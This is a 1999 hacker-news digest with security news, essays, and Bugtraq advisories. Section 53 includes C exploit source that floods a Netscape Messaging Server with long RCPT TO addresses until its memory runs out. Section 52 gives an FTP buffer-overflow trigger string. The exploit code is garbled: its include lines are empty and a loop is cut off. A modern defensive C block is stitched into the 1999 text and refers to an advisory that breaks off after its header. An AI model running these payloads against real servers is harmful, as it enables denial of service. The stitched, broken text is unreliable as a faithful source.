http://www.aviary-mag.com/Martin/Safety/safety.html

And You Thought You Were Safe!
10/27/99
Brian Martin
Staff Writer

The realm of computer security is not an isolated slice of life reserved for geeks and bitheads. Security is all-inclusive, no longer a realm of obscure networks or sensitive databases full of nuclear codes and credit card numbers. I know this may be hard to swallow for many people as they haven't given the matter serious thought. Stop reading for a minute and think about all things computerized in your life. Now consider which ones present potential security or privacy concerns to you. If you think any less than 90% or so present these problems, think again.

Some will cast this notion aside in favor of the argument that so many security concerns are so trivial that they make no real difference. Who cares if someone knows you visited a web site or purchased something online -- right? This argument can effectively be countered any number of ways as long as the reader is willing to give them appropriate consideration. First, each of these small concerns adds up. To use an old but familiar and fitting analogy, consider each privacy violation a brick. Put enough of these bricks together and you have a full-blown wall. Second, at what point do they stop being small and trivial? If you convince yourself that each security vulnerability is small, they slowly begin to grow without you acknowledging it. Before long, they have turned into full-blown risks that your mind associates with 'trivial'.

So in a single day, where do you encounter these risks? Anytime you use technology. Before you say "But I don't use it that much!" think about how much technology surrounds your life. In many cases it has become so integrated that you often stop noticing it. Have a personal organizer like a Palm Pilot? Play games on a Sega Dreamcast? Send e-mail to friends or family via an on-line service? Have controlled access to your office via 'strong' token cards?
These points of technology slowly add up and paint a bigger picture of rapidly degrading privacy while security vulnerabilities increase in number. All of the above, and we've barely touched serious computing as far as most people are concerned. To anyone reading this who is passingly familiar with computer-based news outlets like Wired, MSNBC and others, this is no doubt preaching to the choir. For those of you new to the net, I write this in hopes that you are fully aware just how vulnerable your computer setup and system can be.

The disturbing trend emerging in people's reactions to security is that perception says if you aren't online, you are safe. I hate to break this to you, but connectivity has little to do with security and privacy. All it takes is a single ten-second connection to the net and game over.

You boot up your computer and interface with the Operating System. Be it Windows NT, Windows 95, Solaris or any other platform, it is potentially vulnerable. When you open your browser, it too poses more risks than you can possibly imagine. Both Microsoft Internet Explorer and Netscape Navigator have had their fair share of problems. Even in seemingly safe applications like Microsoft Word lurks danger. Users connecting to the net via cable modem learned quickly that while their walls protected them from neighbors' prying eyes, their modems certainly did not.

As with all articles on security, I try to present the problem and a solution for my readers. What can I possibly suggest to counter such an overwhelming amount of intrusions into your personal privacy and security? Awareness. Just understanding and realizing the concerns better equips you to battle the hordes of bad guys we always read about. Be proactive when using anything electronic, assess the risks, and proceed with caution. All joking aside, it may save you a lot of headache in the near future.
@HWA

45.0 The Weather Channel and Four More .gov/.mil Sites Defaced
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Yesterday was another busy day for those defacing web sites. Web sites owned by the Navy and the Marine Corps were hit, as was The Weather Channel. Groups and people such as Narcissus, High-Tech Hate, fuqraq, flipz, p4riah, Pakistan Hackerz Club and others have claimed responsibility. (Unfortunately most of these pages are not anything to look at, which is why we have not been mirroring them. We did grab a few.)

HNN Defaced Pages Archive
http://www.hackernews.com/archive/crackarch.html

Attrition Web Mirror
http://www.attrition.org/mirror/

@HWA

46.0 Nerds Will Fight Next World War
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

The Economist has an article on how computers are being used as a weapon and how it has changed the way politics, propaganda and other agendas and objectives are being pushed in Asia. This is mostly fear mongering, so if you're busy today don't bother.

The Economist
http://www.economist.com/editorial/freeforall/30-10-99/as9668.html

ASIA
The Internet

HACKING, spamming and spreading viruses. Each is a means to disrupt an enemy’s computer systems, and each has been employed by whizz-kids, maybe even by governments, in recent international disputes. Especially in Asia, computer nerds have nudged their way to the front line this year, arguing that the Internet is a potent weapon. Are they right?

It is certainly useful for propaganda. Hours after the coup in Pakistan this month, the “Islamic group of Hackers” rewrote a government website to praise the army and condemn the arrested prime minister as corrupt, foolish and bald. Earlier, both Pakistani and Indian propagandists concerned with the conflict in Kashmir had denounced their enemies online, and attacked each other’s websites.
That of the Indian army was “hijacked”, its content replaced with stories of torture of Kashmiri separatists. Similar attacks occurred during the Kosovo war this spring, and rival Chinese and Taiwanese hackers frequently compete to plant their national flags on rival sites.

The Internet is anonymous, so groups in repressive countries can use it with some confidence to organise themselves. The Falun Gong spiritual movement in China—which conducted mass protests this spring and again this week, despite a government crackdown—is said by some to be managed by e-mail. The group’s websites are used to spread news and to encourage followers not to be browbeaten. Dissident hackers have attacked Chinese government computers used to censor websites and in return, it is claimed, government technicians have attacked those of dissidents.

This information war is at its fiercest when activists try to sabotage others’ computers. East Timorese separatists threatened to employ scores of expert hackers against the Indonesian authorities if the government tried to rig the independence referendum in August. Jose Ramos Horta, a Timorese leader, vowed that specialists would infect computers of the Indonesian banking system with viruses. That, they said, would bring economic chaos. The threat went unfulfilled.

But in China and Taiwan a cyber war of sorts has been under way for several months. After the Taiwanese president, Lee Teng-hui, said in July that relations with China should be considered as those between countries, teams of hackers have tried to disrupt rival computer systems. The National Security Bureau in Taiwan says that they have broken into government networks, including those at the justice ministry, over 150 times recently. Many incidents are blamed on Chinese government agencies. One report suggests that 72,000 “cyberspace attacks” were launched from China against Taiwan in August alone.
In response, Taiwanese hacked into websites of China’s taxmen and the railways ministry. The toll can be severe. The Pentagon reckons that last year the Taiwanese spread two viruses, known as the Bloody 6/4 and Michelangelo, in part to protest against the massacre of students around Tiananmen Square in 1989. They damaged some 360,000 computers in China, at a cost of $120m.

Taiwan’s deputy prime minister gave warning this autumn that cyber war is a serious worry for the future. And a report this month for the United States Congress said America’s communications, defence, power and emergency services were all vulnerable to computer attacks. Those on businesses—this week a hacker claimed he had stolen details of 150,000 Internet users at Cable and Wireless—illustrate such weaknesses.

So governments are getting involved too. They develop defences for computer networks, and it is assumed they also prepare methods of attack. Hackers at NATO may have meddled with Yugoslavia’s communications system during the Kosovo war. After the bombing of China’s embassy in Belgrade, there was one direct response on the Internet: American government websites were swamped with e-mails. This practice, known as “spamming”, is designed to overload computers with information, making them unworkable.

Cyber attacks have become a favourite topic of military strategists. Taiwan claims China conducted an exercise early this summer in Lanzou and Beijing military districts to see how computer viruses could cripple an enemy’s command-and-control centre. “China has developed the techniques to execute an information war in these military exercises,” said Abe Charlie Lin, of Taiwan’s defence ministry. Others will be doing the same, perhaps with the help of Internet specialists and the many institutes for the study of cyber warfare. There is a service on the Net giving details of such attacks. Unfortunately, it is at present out of order.
@HWA

47.0 Hole Found in Mac OS 9
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by wh4cked

What is believed to be the first security vulnerability found in MacOS 9 has been posted. MacOS 9 has been shipping for less than one week and is the first version of MacOS to support multiple users. The vulnerability allows one user to bypass the Console Lock feature and gain access to another user's files. (This is a wicked simple hole; it is very surprising that this problem was not discovered during testing.)

Security Focus
http://www.securityfocus.com/bid/745

bugtraq id   745
class        Design Error
cve          GENERIC-MAP-NOMATCH
remote       No
local        Yes
published    October 26, 1999
updated      October 26, 1999
vulnerable   Apple MacOS 9.0

MacOS 9 includes an idle-activated console lock feature, similar to a screensaver password in other operating systems. After a certain length of user inactivity, a dialog box appears stating that a password must be entered. After the user clicks 'OK' another dialog box appears offering the option to either supply a password or to log out the current user. If the 'log out' option is chosen, any programs running will start to shut down. In certain programs, dialog boxes are created in the shutdown process (for example, "Exit without saving? OK/Cancel"). If the user selects 'Cancel', the shutdown process is aborted and the user is returned to the current session without ever having to enter a password.

Apple has been notified, and it has been filed into their bug database as ID #2404562.

credit
Posted to Bugtraq by Sean Sosik-Hamor on October 26, 1999.

reference
message: Mac OS 9 Idle Lock Bug (Sean Sosik-Hamor )

@HWA

48.0 Time Spreads Cable Modem FUD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by InfinityMatrix

In the November 1st Issue of Time Magazine, the Technology section highlighted the Cable modem issue.
The author, Chris Taylor, states that "most common attack reported by hacker watchers makes use of a Trojan Horse." It goes on further spreading FUD: "If you've hooked up a microphone, the remote-access hacker can listen to your conversations in real-time. If you own one of those little monitor-top video cameras, he can watch you like Big Brother." (A cable modem is no more dangerous than a regular modem. The fact that you have an insecure machine connected directly to the internet is the problem, not the cable modem. Stop blaming the technology for a personal problem.)

Time.com
http://www.pathfinder.com/time/magazine/articles/0,3266,33139,00.html

PERSONAL TIME/YOUR TECHNOLOGY
NOVEMBER 1, 1999 VOL. 154 NO. 18

Hacker's Delight
Cable modems are a speedy way to surf, but they're vulnerable--unless you protect yourself

BY CHRIS TAYLOR

I know what gadget I want for my birthday this year. It's the same thing I've lusted after for a couple of birthdays now, and I'd trade in all the socks, ties and humorous cards about aging if only I could have it. Unfortunately, I can't, because it's a cable modem--which lets you traverse the Net at about 20 times the speed of a 56K modem--and cable-modem service is very spotty right now. In Manhattan, for example, I'd have to live between 59th and 67th Street, or in the ultra-hip East Village. Service will arrive in my slightly less hip corner of the West Village in fall 2000, which is way too late to help with my dream of downloading every last music track on http://MP3.com.

The other bad news on cable modems--and this is why I'm a little mollified that I can't have one yet--is that they're more vulnerable to hacker attacks than regular set-ups. You see, one of the strengths of surfing via cable is that you're online 24 hours a day and don't have to disconnect every time you want to order Chinese food. But that can also be a weakness, because your IP address (the ZIP code of the Internet) doesn't change.
Dial-up users like me who are still crawling along at 56K get moved to a different IP address every time we log on. We may be slower, but we're harder to find.

Hackers like an easy target, and computers hooked up to cable modems are potentially the lowest-hanging fruit of all. Especially if they're running Windows. For reasons known only to itself, Microsoft makes its operating system default to friendly mode, entirely open to network sharing. This means when you hook your brand-new PC up to your brand-new cable modem, you unwittingly become a node on a massive network whose members can come and look around your hard drive, perhaps download your financial records.

But the most common attack reported by hacker watchers makes use of a Trojan horse. These are programs with bizarre names like Back Orifice or Net Bus that can be hidden in an e-mail attachment--say, one of those animated birthday cards people seem to like e-mailing. Once you open it, you've installed the software--and the wily hacker has remote control of your PC. To be sure, dial-up users get hit by Trojans too. But all the extra bandwidth provided by cable modems makes hackers salivate. If you've hooked up a microphone, the remote-access hacker can listen to your conversations in real-time. If you own one of those little monitor-top video cameras, he can watch you like Big Brother.

Now here's the good news. Such attacks are still rare; they can easily be detected; and all it takes to prevent them is common sense. Turn off file sharing in your network control panel. Add password protection to your most precious files. And for goodness' sake, don't ever, ever open an e-mail attachment from someone you don't know and trust like family. The even better news is that cable-modem providers like Road Runner (partly owned by Time Warner, parent company of this magazine) and Excite@Home are working on bigger and better firewalls to help stop snooping.
Since they're twice as fast as DSL phone lines, cable modems are worth the risk. They will never be hackproof, but they should be a lot safer by the time my next birthday rolls around. This year, I'll have to settle for socks again.

For more on cable modems and how to protect them, see http://timedigital.com.

Questions for Chris? E-mail him at cdt@well.com

END

@HWA

49.0 DutchThreat Quit?
~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/
http://www.dutchthreat.org/

DutchThreat, an underground group, is showing its dismay with the current state of affairs in the underground. Originally the group announced via its web page that it had quit the scene outright, but later said that they 'would be back'. More on this as it progresses...

Original 'quit' message;

" The hackers-scene died and we are not living it anymore.. "

The current defacements by #phreak.nl with their 'RedAttack the Rat' actions pushed us over the edge. It's not just their ignorance, it's the ignorance of so many lately. We are not supporting acts of childish people anymore. With this page we apologize for the behavior of so many.

The Dutch Threat Crew.
info@dutchthreat.org

Current message;

29-10-99

We will be back..

Ok.. you win.. We received loads of mail of people telling us we over-reacted by 'quitting' Dutch Threat. Although it was never the intention to quit Dutch Threat for real, the previous page was more of a temporary protest against script-kiddie behavior that, in our opinion, reached its limits by a #phreak.nl defacement. Since lack of privacy is the issue here we shouldn't run away from it but instead use the medium we have to defend ourselves and give our opinion. That's what Dutch Threat was all about in the beginning.. I'll set up a credit list with all the people that told us so ;)

Tonight, after a long and boring talk with Gerrie (www.hit2000.org) he convinced me (Acos) that publishing private data from individuals in public is the only way to make people privacy-aware.
Although I agree with that, I'm still sure you should never use that information to start a warfare because of a personal disagreement. The RedAttack stuff isn't the only reason for the temporary shutdown of DT, I will explain this later. I still condemn the RedAttack-defacements by phreak.nl because of their childish content.. but I realized they made a point in general. So I will do the same using the motto 'there is no privacy and why should we care?'... ;)

@HWA

50.0 Can you protect your image on the net?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org

Can You Protect Your Image on the Net?
http://www.pcworld.com/pcwtoday/article/0,1510,13494,00.html

Rival developer says Clever Content Server's security is easily cracked.

by David Essex, special to PC World
October 27, 1999, 9:07 a.m. PT

Alchemedia claims that its Clever Content Server encryption software, which started shipping this month, is just what Webmasters and visual artists need to prevent their valuable images from being copied and distributed. But a competing software maker says it easily cracked Alchemedia's program, so hackers could easily do so, too.

Clever Content Server encrypts images stored on a Web site's servers, at a cost of $10,000-plus per server per year. When someone clicks on an image, the program sends a free browser plug-in called Clever Content Viewer, followed by the image. The viewer decrypts and displays the image, but the user can't copy, save, print, or capture it.

"The Internet is a big copying machine," says Alchemedia Chief Executive Officer Daniel Schreiber. Content providers typically put up grainy thumbnail images or none at all. "It's keeping good content off the Web," Schreiber says. "The whole $13-billion digital content industry is unable to take advantage of the e-commerce opportunity."
Get Cracking on This

But Greg Heileman, president of competitor Elisar Systems, says his company broke through the beta version in a day and the shipping version in an hour. He says Clever Content Server attempts to catch improper access of video memory by using three Windows dynamic link libraries, a process that is easy for experienced hackers to crack.

Heileman says his own product, SecureViewer (expected to ship by the end of October), is more secure because it directly controls the video hardware. But he acknowledges that SecureViewer isn't totally hacker-proof, since someone could use a hardware device to grab the video signal on its way to the PC monitor.

SecureViewer, priced at around $6 to $10 for each image encrypted, requires users to download a larger viewer program than Alchemedia's, but does not require server software. To display an image, SecureViewer takes over the entire screen, leaving the browser running in the background.

Schreiber responds that SecureViewer doesn't work in the Web-friendly way that content providers want. He says Clever Content Viewer provides an adequate deterrent to image theft without compromising usability. "We're not really interested in hackers and hacker-proof technology for the simple reason that our customers aren't, either," Schreiber says.

Customer Concerns

Alchemedia (formerly Csafe) first released a beta version of the software early this year under the name PixSafe. One potential customer, Photos to Go, an online vendor of stock photography that has used the beta version in an online demo since February, acknowledged last month that there were security issues surrounding the software.

"There have been things which have been brought to our attention, which have been fixed," says Kathy Mullins, vice president of electronic services at Photos to Go. "We've looked at a lot of security products, and no one has told us they're airtight. Hackers will always find a way."
@HWA

51.0 Do secure email sites offer foolproof safety?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/

http://www.seattletimes.com/news/technology/html98/inbo_19991024.html

Do secure e-mail sites offer foolproof safety?

by Charles Bermant
Special to the Seattle Times

The notion that free Web-based e-mail may not be secure is a scary thought for users of these services, as they have come to rely on the convenience of logging on anywhere and exchanging up-to-the-minute information. These people don't want to have to lug a laptop around, or worse: wait until they get home until checking their messages.

There is now an alternative - sort of. Free e-mail services that promise an increased level of security are emerging, promising that what you put on their servers is doubly protected from prying eyes. Both HushMail http://www.hushmail.com and SAFe-mail.net http://www.safe-mail.net sell (actually, give away) peace of mind.

Both have simple, Web-based interfaces, not quite as robust as Outlook or Eudora but usable nonetheless. Hush Mail resembles HotMail, with its display ads and membership solicitation attached to each message. SAFe-mail.net has no such decoration. HushMail has no frills, while SAFe-mail attempts to build a community, offering a chat room and bulletin boards.

SAFe-mail follows the now time-honored Internet tradition of providing free goods as a teaser for its paid service. Explains company representative Ian Buller, "We will offer a chargeable service to organizations who want to outsource their secure communications or as a delivered system to organizations who want to host the server at their own location."

According to my unscientific test, the two services also differ in other ways: HushMail has a faster mail client interface, while SAFe-mail has a slightly faster delivery.

In fact, their usefulness is necessarily limited. The encryption works only on mail sent and received on their server.
Cross their firewall, and it's just as open as any other system. So in order for it to make a difference, all correspondence must take place on their server. Anywhere else, a HushMail or SAFe-net address is just an advertisement for security, the equivalent of a Brinks sign on the lawn of a house that doesn't have an alarm system.

Still, it's a little strange to see people get all worked up about e-mail security. Protection of messages is equivalent to talking on the phone or having a "private" conversation in a restaurant. Technology exists to eavesdrop, and anything you say on the phone could be coming out of a speaker somewhere. But so what? The average conversations concern only the participants and their circle of associates. Who else really cares about what you are saying? Bill Gates and Bill Clinton need to take appropriate measures, but the rest of us just need to be reasonably tactful and discreet.

Reader response: Mauri Pelto agreed with my emoticon-phobia, saying "the use of cutesy smiley faces and jargon only says to me the writer thinks of himself as pretty cool just because he has learned to use e-mail and needs to use the `in-language' of his new peer group to remind himself he's pretty cool. Content has become secondary to cutesiness."

But David P. Anderson disagreed - violently. After calling this column "a waste of newspaper space better spent on advertising" (ouch), he points out "these symbols have been in use for long enough to have their own name. In fact, they've been around longer than computers, how do you think disparate cultures learn to communicate? Or perhaps, you just figure they should learn English?"

Dave counsels me to "do a little research, find out why these things are done, before you decide that it's your job to tell us we shouldn't do them." I think he is confused. It is not my "job" to tell anyone how to act. I only suggest that some aspects of e-mail behavior may be offensive or annoying.
An extremist position - "emoticons are bad" - is only meant to push people toward more moderate behavior: "If I can prevent just one person from sending just one smiley face. ..."

And at the end of an amusing letter where each potential emoticon was explained in parentheses, Michael Cameron got to his point: "As a literary tool to avoid confusion, instill a bit of `humanity' back into your communications in this totally `cold and impersonal realm,' (emoticons) are priceless."

Charles Bermant's advice on e-mail appears weekly in the Personal Technology section of The Seattle Times. If you have questions or suggestions, you can contact him, by e-mail, at ptech@seatimes.com Type "Inbox" in the subject field.

@HWA

52.0 Celtech ExpressFS USER Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   749
class        Boundary Condition Error
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        Yes
published    October 29, 1999
updated      October 29, 1999
vulnerable   Celtech Software ExpressFS 2.6
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0

Celtech's ExpressFS FTP server has been found to be vulnerable to a buffer overflow. If an argument of sufficient length is passed after the USER command, the next command sent will cause it to crash.

credit
Posted to bugtraq by Luciano Martins on October 29, 1999.

reference
message: ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability (Luciano Martins )

To: BugTraq
Subject: ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability
Date: Thu Oct 28 1999 19:04:40
Author: Luciano Martins
Message-ID:

ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability

Problem:

We found that the ExpressFS 2.x FTP Server and earlier are vulnerable to a remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system.
The vulnerability is the conjunction of one long user name and another command, in this case PASS. If these commands are passed in order, the program crashes.

Tested in: Windows 98 / Windows NT

Example:

First command

USER zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

Second command

PASS i want you crash :)

Crash.....Overflow.
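Both this ExpressFS report and the WFTPD MKD/CWD report later in this issue (54.0) come down to the same defect: an FTP daemon copies a command argument into a fixed-size buffer without checking its length first. The following is an added example, not code from either vendor or from the Bugtraq posts, of how a server-side command handler bounds that copy; the 255-byte argument limit, the session layout, the status codes and the test harness are assumptions for this demo.

```c
/* Added example (not vendor or Bugtraq code): bounded handling of FTP command
 * arguments. The 255-byte limit, status codes and session layout are assumed. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define FTP_ARG_MAX  255   /* longest argument the session stores (assumed)   */
#define FTP_LINE_MAX 512   /* RFC 959 minimum command-line length, incl. CRLF */

enum ftp_status { FTP_OK = 0, FTP_ERR_LINE_TOO_LONG, FTP_ERR_ARG_TOO_LONG,
                  FTP_ERR_SYNTAX, FTP_ERR_UNKNOWN_VERB };

struct ftp_session {
    char user[FTP_ARG_MAX + 1];   /* +1 keeps room for the terminating NUL */
    char cwd[FTP_ARG_MAX + 1];
};

/* The pattern behind the reported crashes: an unchecked copy into a fixed
 * buffer. Shown for contrast only; nothing in this file calls it. */
void unsafe_store(char dst[FTP_ARG_MAX], const char *arg)
{
    strcpy(dst, arg);   /* overruns dst as soon as strlen(arg) >= FTP_ARG_MAX */
}

/* strlen that examines at most cap bytes, so unterminated input is never
 * scanned past its buffer. */
static size_t bounded_len(const char *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != '\0')
        n++;
    return n;
}

/* Copy arg into dst (capacity cap) only if it fits together with its NUL.
 * Returns 0 on success, -1 if it would not fit; dst is untouched on -1. */
static int bounded_store(char *dst, size_t cap, const char *arg)
{
    size_t n = bounded_len(arg, cap);
    if (n >= cap)                  /* n == cap: no NUL within cap bytes */
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Parse "VERB arg\r\n" and apply it to the session. Every length check comes
 * before every copy, so an oversized USER, MKD or CWD argument produces an
 * error status rather than a memory overrun. */
enum ftp_status ftp_handle_line(struct ftp_session *s, const char *line)
{
    char verb[5], arg[FTP_LINE_MAX + 1];
    size_t len = bounded_len(line, FTP_LINE_MAX + 1), i = 0, v = 0, a = 0;
    if (len > FTP_LINE_MAX)
        return FTP_ERR_LINE_TOO_LONG;
    while (i < len && line[i] != ' ' && line[i] != '\r' && line[i] != '\n') {
        if (v >= sizeof verb - 1)
            return FTP_ERR_SYNTAX;     /* FTP verbs are at most four letters */
        verb[v++] = (char)toupper((unsigned char)line[i++]);
    }
    verb[v] = '\0';
    if (v == 0)
        return FTP_ERR_SYNTAX;
    if (i < len && line[i] == ' ')
        i++;
    while (i < len && line[i] != '\r' && line[i] != '\n')
        arg[a++] = line[i++];          /* a < len <= FTP_LINE_MAX: cannot overflow */
    arg[a] = '\0';
    if (strcmp(verb, "USER") == 0)
        return bounded_store(s->user, sizeof s->user, arg) ? FTP_ERR_ARG_TOO_LONG : FTP_OK;
    if (strcmp(verb, "MKD") == 0 || strcmp(verb, "CWD") == 0)
        return bounded_store(s->cwd, sizeof s->cwd, arg) ? FTP_ERR_ARG_TOO_LONG : FTP_OK;
    if (strcmp(verb, "PASS") == 0 || strcmp(verb, "QUIT") == 0)
        return FTP_OK;
    return FTP_ERR_UNKNOWN_VERB;
}

/* Harness: send "VERB " + n copies of fill + CRLF to a fresh session (the
 * constructed inputs mirror the reports: 1552 'z's after USER, 255 'a's after
 * MKD) and report the status plus how many argument bytes the session holds. */
struct feed_result { enum ftp_status status; size_t stored; };
struct feed_result feed_padded(const char *verb, size_t n, char fill)
{
    struct ftp_session s;
    struct feed_result r = { FTP_ERR_SYNTAX, 0 };
    size_t vlen = strlen(verb);
    char *line = malloc(vlen + 1 + n + 3);
    memset(&s, 0, sizeof s);
    if (line == NULL)
        return r;
    memcpy(line, verb, vlen);
    line[vlen] = ' ';
    memset(line + vlen + 1, fill, n);
    memcpy(line + vlen + 1 + n, "\r\n", 3);
    r.status = ftp_handle_line(&s, line);
    r.stored = strlen(s.user) + strlen(s.cwd);   /* at most one of them is set */
    free(line);
    return r;
}
```

Note that a 255-byte MKD argument is only safe because the session buffer is 256 bytes; a buffer sized to exactly 255 has no room for the terminator, which matches the "exactly 255 characters" trigger in the WFTPD report.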
Published by: USSRBACK

Luck Martins
u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
www.USSRBACK.COM

@HWA

53.0 Netscape Messaging Server RCPT TO DoS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   748
class        Input Validation Error
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        Yes
published    October 29, 1999
updated      October 29, 1999
vulnerable   Netscape Messaging Server 3.6
             Netscape Messaging Server 3.55
             Netscape Messaging Server 3.54

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service.

Example and exploit by Nobuo Miwa

220 victim.workgroup ESMTP server (Netscape Messaging Server - Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient

#include
#include
#include
#include
#include

#define STR_HELO     "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000
#define RCPT2_NUMBER 10000

int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    int port=25, sd, rt ;
    long li ;
    struct hostent *he;

    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    si->sin_family = AF_INET;
    si->sin_port = htons (port);
    sd = socket (si->sin_family, SOCK_STREAM, 0);
    if (sd == -1) return (-1);
    rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
    if ( rt < 0 ) { close(sd); return(-1); }
    return(sd) ;
}

void sendRCPT2(int sd)
{
    char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
    int rt, i;

    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    recv( sd, tmpStr, sizeof(tmpStr), 0 );
    printf("%s",tmpStr);
    printf("%s",STR_HELO);
    send( sd, STR_HELO, strlen(STR_HELO), 0 );
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
    if ( rt>0 ) printf("%s",tmpStr);
    printf("%s",STR_MAILFROM);
    send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
    if ( rt>0 ) printf("%s",tmpStr);
    strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
    while ( RCPT2_LENGTH-strlen(rcptStr)>10 ) strcat( rcptStr, "aaaaaaaaaa") ;
    strcat( rcptStr, "\n" );
    for ( i=0 ; i0 ) printf("%s \n",strn); }
    return;
}

int main (int argc, char *argv[])
{
    char hostIPaddr[80], *cc, *pfft;
    int sd = 0;
    struct sockaddr_in si;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) {
        printf("Usage: %s IPaddress \n",argv[0]);
        exit(1);
    }
    else strcpy (hostIPaddr, argv[1]);
    sd = openSocket(&si,hostIPaddr);
    if (sd < 1) { printf("failed!\n"); exit(-1); }
    sendRCPT2( sd );
    close (sd);
    exit(0);
}

Netscape has stated a release date of December 1999 for Messaging Server 4.15, which will not include this vulnerability.

credit
Posted to Bugtraq October 29 by Nobuo Miwa .

reference
message: Netscape Messaging Server RCPT TO vul. (Nobuo Miwa )

@HWA

54.0 WFTPD Remote Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   747
class        Boundary Condition Error
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        No
published    October 28, 1999
updated      October 28, 1999
vulnerable   Texas Imperial Software WFTPD 2.40
